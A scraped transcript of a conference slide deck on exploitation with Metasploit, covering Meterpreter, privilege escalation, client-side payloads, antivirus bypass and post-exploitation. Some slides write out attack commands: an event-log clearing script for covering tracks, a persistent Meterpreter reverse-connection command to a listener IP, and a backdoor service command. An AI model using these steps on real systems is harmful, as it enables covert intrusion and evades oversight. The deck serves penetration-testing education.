Nethemba metasploit
0 likes6,791 views
The document discusses the Metasploit framework, an open-source platform for developing and using exploit code. It summarizes the history and components of Metasploit, how to use exploits and payloads, and how additional tools like Meterpreter allow full control of compromised systems. Advanced techniques are covered like reflective DLL injection, maintaining persistent access, and exploiting client-side vulnerabilities.
Nethemba metasploit
- 1. www.nethemba.com www.nethemba.com Exploitation with Metasploit Nethemba s.r.o. Norbert Szetei, CEH norbert.szetei@nethemba.com
- 2. www.nethemba.com Prologue Metasploit Project Metasploit Framework – opensource platform for exploit developing, testing and using exploit code Metasploit Express, Metasploit Pro, NeXpose
- 3. www.nethemba.com What else? Passive or active exploits Linux / Mac OS X / Windows / IRIX / HPUX / Solaris IPS/IDS testing Different communication channels
- 4. www.nethemba.com History of Metasploit 1.0 (20032004) PERL, 15 exploits, project started by HD Moore 2.7 (20032006) PERL, more than 150 exploits 3.+ (2007today) Ruby, 628 exploits Currently 18 active developers Code contribution from hundreds of people
- 5. www.nethemba.com Fundamental Parts Interfaces (Console, CLI, ...) Libraries (Rex, MSF Core, MSF Base) Plugins (db support, wmap, xmlrpc, ...) Tools (mostly external usage) Modules (Exploits, Auxiliaries, Payloads, Encoders, Nops)
- 6. www.nethemba.com Metasploit testing environment Virtual machines laboratory Metasploitable Remove your Windows updates Hacking the web browsers Become a hac.. penetration tester
- 7. www.nethemba.com Simple Usage exploits (check), auxiliaries payloads (singles, stagers, stages) portscan, db_autopwn generating payloads meterpreter, vncinject (full control over user) msfencode, msfpayload
- 8. www.nethemba.com Meterpreter Injection into DLL Reverse connections Core commands Stdapi commands Priv commands
- 9. www.nethemba.com Meterpreter STDAPI File System commands Networking commands System commands User interface commands Keylogging
- 10. www.nethemba.com Meterpreter Priv System Elevation: Named Pipe Impersonation Token Duplication KiTrap0D hashdump timestomp (MACE)
- 11. www.nethemba.com Meterpreter Priv System Elevation: Named Pipe Impersonation Token Duplication KiTrap0D hashdump timestomp (MACE)
- 12. www.nethemba.com Can a firewall protect us? ● Attacks on layer 7 ● Botnets ● Social Engineering + Phishing (SET) ● PassiveX ● IDS Detection > SSL Encryption
- 13. www.nethemba.com Passive X ● Modifies registry on Windows to permit loading untrusted ActiveX ● Loads stage ActiveX control from MSF web server ● Loads stagers (Meterpreter, VNC) via HTTP tunnel ● Unfortunately it works in IE6 only
- 14. www.nethemba.com Reflective DLL Injection Loading of a library from memory into a host process Library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader Minimal interaction with the host system and process Difficult detection of the DLL
- 15. www.nethemba.com Integration with third party apps ● Nessus ● NeXpose ● (Ratproxy) WMAP Web Scanner ● (Aircrack) Karmetasploit
- 16. www.nethemba.com Exploit development ● pattern_create.rb, pattern_offset.rb ● porting exploits ● SEH exploitation, msfpescan ● msfelfscan, msfmachscan ● irb, framework for exploits development
- 17. www.nethemba.com Exploitation on the Client Side ● Binary Payloads ● Trojan Infection ● PDF ● Java Applet ● VBScript ● Antivirus bypass
- 18. www.nethemba.com msfencode ● msfpayload for raw payload generation ● Msfencode x Specify an alternate win32 executable template ● Injection into an existing executable, the same functionality
- 19. www.nethemba.com Post Exploitation ● PSExec (windows/smb/psexec) ● Covering your tracks (event logs) log = client.sys.eventlog.open('system') log.clear ● Sniffing (meterpreter, auxiliaries)
- 20. www.nethemba.com Maintaining access ● Persistent Meterpreter Service run persistence X i 15 p 3443 r 192.168.64.3 ● Meterpreter Backdoor Service metsvc h
- 22. www.nethemba.com References ● http://www.metasploit.com ● http://www.offensivesecurity.com/ ● svn co https://www.metasploit.com/svn/framework3/trunk/
- 23. www.nethemba.com Any questions? Thank you for listening Norbert Szetei, CEH